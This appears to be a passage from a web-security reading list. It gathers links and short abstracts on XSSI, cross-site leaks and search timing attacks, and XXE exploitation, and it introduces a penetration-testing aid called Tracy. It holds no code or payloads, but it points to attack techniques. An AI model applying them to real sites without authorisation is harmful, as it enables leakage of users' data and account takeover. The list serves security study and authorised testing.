* Being able to comprehend causal relationships between sources of user input and their corresponding output is a distinguishing characteristic that separates the master web hacker from the novice script kiddy. The better a tester can grasp these relationships, the faster they can abuse lapses in input sanitization, identify dangerous programming patterns, and understand the overall attack surface of the application. However, enumerating these relationships is difficult and time intensive to do by hand, especially with JavaScript-heavy apps. Security scanning tools have tried to automate this procedure, but they face several problems in modern web applications: To solve these problems, we need a tool that augments, not automates, a manual penetration tester by helping them understand all of the inputs and outputs of a web application. To this end, we present Tracy, a tool for assisting penetration testers with enumerating every sink of output for all user input sources.
XSSI
https://blog.cm2.pw/exploiting-post-based-xssi/
https://www.usenix.org/system/files/conference/usenixsecurity15/sec15-paper-lekies.pdf
* [XSSI and JSONP leaks](https://github.com/EdOverflow/bugbountywiki/wiki/XSSI-and-JSONP-leaks)
* [The Tale of a Fameless but Widespread Web Vulnerability Class - Veit Hailperin](https://www.youtube.com/watch?v=5qA0CtS6cZ4)
* [Blogpost](https://www.scip.ch/en/?labs.20160414)
* Two keys components account for finding vulnerabilities of a certain class: awareness of the vulnerability and ease of finding the vulnerability. Cross-Site Script Inclusion (XSSI) vulnerabilities are not mentioned in the de facto standard for public attention - the OWASP Top 10. Additionally there is no public tool available to facilitate finding XSSI. The impact reaches from leaking personal information stored, circumvention of token-based protection to complete compromise of accounts. XSSI vulnerabilities are fairly wide spread and the lack of detection increases the risk of each XSSI. In this talk we are going to demonstrate how to find XSSI, exploit XSSI and also how to protect against XSSI.
XS-Leaks
https://arturjanc.com/visited-delenda-est.pdf
XS-Search
https://www.youtube.com/watch?v=HcrQy0C-hEA
https://scarybeastsecurity.blogspot.com/2009/12/cross-domain-search-timing.html
https://www.abortz.net/papers/timingweb.pdf
https://www.owasp.org/images/a/a7/AppSecIL2015_Cross-Site-Search-Attacks_HemiLeibowitz.pdf
https://medium.com/@luanherrera/xs-searching-googles-bug-tracker-to-find-out-vulnerable-source-code-50d8135b7549
https://www.blackhat.com/docs/us-16/materials/us-16-Gelernter-Timing-Attacks-Have-Never-Been-So-Practical-Advanced-Cross-Site-Search-Attacks.pdf
https://sites.google.com/site/bughunteruniversity/nonvuln/xsleaks
https://terjanq.github.io/Bug-Bounty/Google/cache-attack-06jd2d2mz2r0/index.html
https://github.com/xsleaks/xsleaks/wiki/Links
http://sirdarckcat.blogspot.com/2019/03/http-cache-cross-site-leaks.html
XXE
https://www.shielder.it/blog/dont-open-that-xml-xxe-to-rce-in-xml-plugins-for-vs-code-eclipse-theia/
https://gosecure.github.io/xxe-workshop/#0
https://cinzinga.com/XXE-Case-Studies/
https://read.martiandefense.llc/hacking-xml-xml-injection-51bea2edd3a2?gi=5fb445391ec6
https://gosecure.github.io/presentations/2019-06-19-hack_in_paris/HIP2019-Advanced_XXE_Exploitation.pdf
https://gosecure.github.io/presentations/2019-06-19-hack_in_paris/Exercise_1_simple.pdf
https://gosecure.github.io/presentations/2019-06-19-hack_in_paris/Exercise_2_external_dtd.pdf
https://gosecure.github.io/presentations/2019-06-19-hack_in_paris/Exercise_3_php_encoding.pdf
https://gosecure.github.io/presentations/2019-06-19-hack_in_paris/Exercise_4_jar_proto.pdf
https://gosecure.github.io/presentations/2019-06-19-hack_in_paris/Exercise_5_local_dtd.pdf
https://speakerdeck.com/0ang3el/a-hackers-perspective-on-aem-applications-security